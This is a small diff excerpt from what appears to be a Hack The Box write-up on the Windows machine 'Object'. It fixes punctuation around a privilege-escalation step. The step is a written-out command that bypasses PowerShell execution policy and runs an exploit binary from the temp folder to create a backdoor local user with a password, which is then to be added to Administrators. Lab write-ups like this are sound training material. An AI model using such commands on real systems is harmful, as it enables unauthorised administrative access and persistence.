0x3ds/0x3ds.github.io/_posts/HacktheBox/Machines/Windows/Hard/2025-11-01-htb-object.md

 We can utilise the escalate privileges to create a new account and add it to the Administrator group.

-First we can create our new user called `shadows` using the following command:\
+First, we can create our new user called `shadows` using the following command:\
 `cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "%TEMP%\resource.temp\efspot.exe 'net user shadows Shad0wsRUS1! /add'"`

 ![light mode only](/assets/img/posts/htb/machines/windows/hard/object/object_37.png){: .light .w-100 .shadow .rounded-10 w='1212' h='668' }